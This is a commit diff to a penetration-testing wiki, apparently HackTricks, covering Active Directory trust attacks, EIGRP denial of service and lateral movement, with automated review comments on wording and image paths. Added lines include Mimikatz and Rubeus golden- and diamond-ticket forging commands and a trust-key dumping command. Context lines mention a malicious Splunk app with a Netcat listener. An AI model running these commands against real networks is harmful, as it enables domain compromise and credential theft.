GitBook: [#3573] No subject
Before Width: | Height: | Size: 84 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 84 KiB |
BIN
.gitbook/assets/image (1) (1) (2).png
Normal file
After Width: | Height: | Size: 143 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 20 KiB |
BIN
.gitbook/assets/image (2) (6).png
Normal file
After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 12 KiB |
BIN
.gitbook/assets/image (3) (4).png
Normal file
After Width: | Height: | Size: 143 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 80 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 80 KiB |
Before Width: | Height: | Size: 490 KiB |
Before Width: | Height: | Size: 25 KiB After Width: | Height: | Size: 490 KiB |
BIN
.gitbook/assets/image (4) (4).png
Normal file
After Width: | Height: | Size: 110 KiB |
Before Width: | Height: | Size: 110 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 4.5 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 4.5 KiB |
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 25 KiB |
|
@ -177,7 +177,7 @@
|
||||||
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
|
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
|
||||||
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
|
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
|
||||||
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
|
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
|
||||||
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
|
* [External Forest Domain - OneWay (Inbound) or bidirectional](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
|
||||||
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
|
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
|
||||||
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
|
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
|
||||||
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
|
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
|
||||||
|
|
|
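Review bot: the renamed SUMMARY entry reads `External Forest Domain - OneWay (Inbound) or bidirectional` while the neighbouring entry is spelled `External Forest Domain - One-Way (Outbound)`; use one spelling (`One-Way`) for both so the two sidebar entries line up, and since a two-way trust is also the case covered by the Outbound page, decide whether the `or bidirectional` qualifier belongs on that entry too.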
@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
|
||||||
|
|
||||||
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Arguments of the script:
|
Arguments of the script:
|
||||||
|
|
||||||
|
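Review bot: the context line around the screenshot swap still carries a stray empty bold marker right after the link (`[**helloflooding.py**](...) **** script`), which GitBook renders as literal asterisks; this hunk only changes the figure path to `image (2) (6).png`, so dropping the `****` here would be a cheap ride-along fix.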
@ -173,7 +173,7 @@ Script arguments:
|
||||||
|
|
||||||
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Script arguments
|
Script arguments
|
||||||
|
|
||||||
|
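Review bot: the unchanged context line `This attack is implemented [**routingtableoverflow.py**](...) **script**` is missing its preposition; `is implemented in the ... script` reads correctly. Only the figure path changes to `image (3) (4).png` in this hunk, so the wording fix could go in with it.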
@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
|
||||||
|
|
||||||
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (4) (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
|
||||||
|
|
||||||
The next step is to choose `Install app from file` and upload the application.
|
The next step is to choose `Install app from file` and upload the application.
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
||||||
|
|
||||||
|
|
|
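Review bot: the Splunk page now points at `../.gitbook/assets/image (4).png`, which is the same basename that the EIGRP hunk in this commit moves away from (`image (4).png` becomes `image (4) (4).png`); confirm that the file now stored as `image (4).png` is the Splunk `Install app from file` screenshot and not the routing-table-overflow capture, because GitBook reassigns these numbered names on every re-upload.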
@ -281,7 +281,7 @@ In this case the attacker **won't receive the response timeout until he has send
|
||||||
|
|
||||||
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
||||||
|
|
||||||
|
|
|
@ -532,17 +532,20 @@ It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways
|
||||||
|
|
||||||
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
|
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
|
||||||
|
|
||||||
A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
|
**Different trusting relationships**
|
||||||
|
|
||||||
**Different trusting relationships:**
|
* **Parent-Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
|
||||||
|
|
||||||
* **Parent/Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
|
|
||||||
* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
|
* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
|
||||||
* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
|
* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
|
||||||
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
||||||
* **Forest** – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.
|
* **Forest** – a transitive trust between two forest root domain. Forest trusts also enforce SID filtering.
|
||||||
* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
|
* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
|
||||||
|
|
||||||
|
#### Other differences in **trusting relationships**
|
||||||
|
|
||||||
|
* A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
|
||||||
|
* A trust relationship can be set up as **bidirectional trust** (both trust each other) or as **one-way trust** (only one of them trust the other).
|
||||||
|
|
||||||
### Attack Path
|
### Attack Path
|
||||||
|
|
||||||
1. **Enumerate** the trusting relationships
|
1. **Enumerate** the trusting relationships
|
||||||
|
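Review bot: the rewritten Forest bullet reads `a transitive trust between two forest root domain`; it should be `domains`. In the unchanged context of the same hunk, `B ins the trusted one` should be `B is the trusted one`, and the External bullet still says SID filtering is `covered later in this post`, a phrase copied from the source blog that points nowhere on this page. Moving the transitive/non-transitive sentence into the new `Other differences in trusting relationships` list is fine, but the second item of that list (`bidirectional trust ... or one-way trust`) now repeats the `a trust can be 1 way or 2 ways` statement in the paragraph at the top of the hunk; keep it in one place.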
@ -599,7 +602,7 @@ It is possible to compromise the root domain in various ways. Examples:
|
||||||
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||||
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||||
|
|
||||||
### External Forest Domain - One-Way (Inbound)
|
### External Forest Domain - One-Way (Inbound) or bidirectional
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Get-DomainTrust
|
Get-DomainTrust
|
||||||
|
|
|
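Review bot: the section heading becomes `External Forest Domain - One-Way (Inbound) or bidirectional` here, but the H1 of the page it introduces (changed in this same commit) is `External Forest Domain - OneWay (Inbound) or bidirectional` and the SUMMARY entry uses `OneWay` as well; unify the hyphenation so the methodology heading, the SUMMARY entry and the page title match (the file slug `external-forest-domain-oneway-inbound.md` can stay, since existing links depend on it).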
@ -89,7 +89,7 @@ Sometimes when creating a trust relationship, a password must be typed in by the
|
||||||
|
|
||||||
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (1) (1) (1) (2).png>)
|
![](<../../.gitbook/assets/image (1) (1) (1).png>)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -1,22 +1,18 @@
|
||||||
# External Forest Domain - OneWay (Inbound)
|
# External Forest Domain - OneWay (Inbound) or bidirectional
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
In this scenario an external domain is trusting you, so you can get some kind of access over it.
|
In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
|
||||||
|
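Review bot: this hunk mixes the substantive change (title and intro now covering bidirectional trusts) with a bullet-marker rewrite of the sponsor block from `-` to `*`, unrelated churn that bloats the diff and will flip back on the next GitBook sync; keep marker changes out of content commits. The new intro sentence `an external domain is trusting you (or both are trusting each other)` is fine, but say the direction explicitly: by the page's own definition (`in Domain B, this would be an Inbound trust`) your domain is the trusted side here, which is the opposite perspective from the `One-Way (Outbound)` page readers may arrive from.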
@ -69,17 +65,25 @@ IsGroup : True
|
||||||
IsDomain : True
|
IsDomain : True
|
||||||
|
|
||||||
# You may also enumerate where foreign groups and/or users have been assigned
|
# You may also enumerate where foreign groups and/or users have been assigned
|
||||||
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
||||||
```
|
```
|
||||||
|
|
||||||
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
|
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
|
||||||
|
|
||||||
|
## Initial Access
|
||||||
|
|
||||||
|
If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
|
||||||
|
|
||||||
|
{% content-ref url="./" %}
|
||||||
|
[.](./)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Impersonation
|
## Impersonation
|
||||||
|
|
||||||
### With signing key
|
### With signing key
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
As a reminder, you can get the signing key with 
|
As a reminder, you can get the signing key with
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
||||||
|
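Review bot: the new `Initial Access` section links to `{% content-ref url="./" %}` with the label `[.](./)`, which renders as a bare dot; point it at the methodology README explicitly and give it a readable label. In the same hunk's context, `the **External Admins** group who has **Admin access**` should be `which has`. The `Invoke-Mimikatz -Command '"lsadump::trust /patch"'` reminder under `With signing key` is correct as written.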
@ -119,14 +123,10 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
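Review bot: the context line in this hunk's header, `Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external ...`, has a typo in the SPN (`doamin`) and passes a DC hostname to `/domain`, which expects the domain name (`domain.external`); the hunk itself only restyles the sponsor bullets, so this is a neighbouring fix rather than a blocker.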
@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
|
||||||
|
|
||||||
Now establish the session, which will forward us to **the first server**.
|
Now establish the session, which will forward us to **the first server**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
||||||
|
|
||||||
|
@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
|
||||||
|
|
||||||
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### OpenSSH <a href="#openssh" id="openssh"></a>
|
### OpenSSH <a href="#openssh" id="openssh"></a>
|
||||||
|
|
||||||
|
@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
|
||||||
|
|
||||||
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
||||||
|
|
||||||
|
|
|
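Review bot: in the OpenSSH steps the two figure paths rotate through each other: `image (38).png` becomes `image.png`, and two lines later the old `image.png` becomes `image (1).png`, so the old target of the second figure is exactly the new target of the first. Verify that the `Install-sshd.ps1` screenshot and the firewall-rule/service-start screenshot did not get swapped.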
@ -30,14 +30,16 @@ Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSi
|
||||||
|
|
||||||
### Golden Ticket (Mimikatz) with KRBTGT-AES256
|
### Golden Ticket (Mimikatz) with KRBTGT-AES256
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
|
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
|
||||||
|
|
||||||
/user is the username to impersonate.
|
/user is the username to impersonate (could be anything)
|
||||||
/domain is the current domain.
|
/domain is the current domain.
|
||||||
/sid is the current domain SID.
|
/sid is the current domain SID.
|
||||||
/sids is the SID of the target group to add ourselves to.
|
/sids is the SID of the target group to add ourselves to.
|
||||||
/aes256 is the AES256 key of the current domain's krbtgt account.
|
/aes256 is the AES256 key of the current domain's krbtgt account.
|
||||||
|
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
|
||||||
/startoffset sets the start time of the ticket to 10 mins before the current time.
|
/startoffset sets the start time of the ticket to 10 mins before the current time.
|
||||||
/endin sets the expiry date for the ticket to 60 mins.
|
/endin sets the expiry date for the ticket to 60 mins.
|
||||||
/renewmax sets how long the ticket can be valid for if renewed.
|
/renewmax sets how long the ticket can be valid for if renewed.
|
||||||
|
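Review bot: the added line `--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option` has `HTML` where `NTLM` (the NT hash of the krbtgt account) is meant; compare the `/krbtgt:ff46a9d8bd66c6efd77603da26796f35` usage further down the same file. The `{% code overflow="wrap" %}` opener added here is only closed in the next hunk, so the two hunks must land together.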
@ -45,6 +47,7 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
|
||||||
# The previous command will generate a file called ticket.kirbi
|
# The previous command will generate a file called ticket.kirbi
|
||||||
# Just loading you can perform a dcsync attack agains the domain
|
# Just loading you can perform a dcsync attack agains the domain
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
For more info about golden tickets check:
|
For more info about golden tickets check:
|
||||||
|
|
||||||
|
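Review bot: the added `{% endcode %}` closes the `{% code overflow="wrap" %}` opened in the previous hunk, which is fine; while touching this block, the context comment `Just loading you can perform a dcsync attack agains the domain` should read `Just by loading it you can perform a DCSync attack against the domain`.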
@ -54,10 +57,17 @@ For more info about golden tickets check:
|
||||||
|
|
||||||
### Diamond Ticket (Rubeus + KRBTGT-AES256)
|
### Diamond Ticket (Rubeus + KRBTGT-AES256)
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```powershell
|
```powershell
|
||||||
# Use the /sids param
|
# Use the /sids param
|
||||||
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
||||||
|
|
||||||
|
# Or a ptt with a golden ticket
|
||||||
|
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
|
||||||
|
|
||||||
|
# You can use "Administrator" as username or any other string
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
For more info about diamond tickets check:
|
For more info about diamond tickets check:
|
||||||
|
|
||||||
|
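Review bot: the new `Rubeus.exe golden /rc4:<krbtgt hash> ... /ptt` command is placed under the `Diamond Ticket (Rubeus + KRBTGT-AES256)` heading, but it forges a golden ticket, not a diamond one; move it up to the golden-ticket section or retitle the block. It also targets RID 519 (`/sids:<parent_domain_sid>-519`, Enterprise Admins) while the diamond example above uses `-512` (Domain Admins); both work, but say which the reader should pick, since the later text only says `Escalate to DA of root or Enterprise admin`.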
@ -65,21 +75,81 @@ For more info about diamond tickets check:
|
||||||
[diamond-ticket.md](diamond-ticket.md)
|
[diamond-ticket.md](diamond-ticket.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
||||||
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
||||||
